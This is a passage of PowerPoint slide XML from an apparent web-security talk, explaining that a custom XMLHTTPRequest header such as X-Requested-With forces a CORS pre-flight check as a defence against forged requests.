              </a:defRPr>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="362282"/>
                    <a:satOff val="31803"/>
                    <a:lumOff val="-18242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can we force the browser to make Pre-Flight check? And tell the server?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1612900" indent="-977900">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buChar char="→ "/>
              <a:defRPr sz="4500"/>
            </a:pPr>
            <a:r>
              <a:t>You can add custom header to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>XMLHTTPRequest</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="2247900" indent="-977900">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buChar char="→ "/>
              <a:defRPr sz="4500"/>
            </a:pPr>
            <a:r>
              <a:t>Forces Pre-Flight because custom header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="2247900" indent="-977900">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buChar char="→ "/>
              <a:defRPr sz="4500"/>
            </a:pPr>
            <a:r>
              <a:t>Never sent by the browser itself when performing normal </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4500"/>
            </a:pPr>
            <a:r>
              <a:t>Typically developers use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumOff val="-13575"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>X-Requested-By</a:t>
            </a:r>
            <a:r>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumOff val="-13575"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>X-Requested-With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30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30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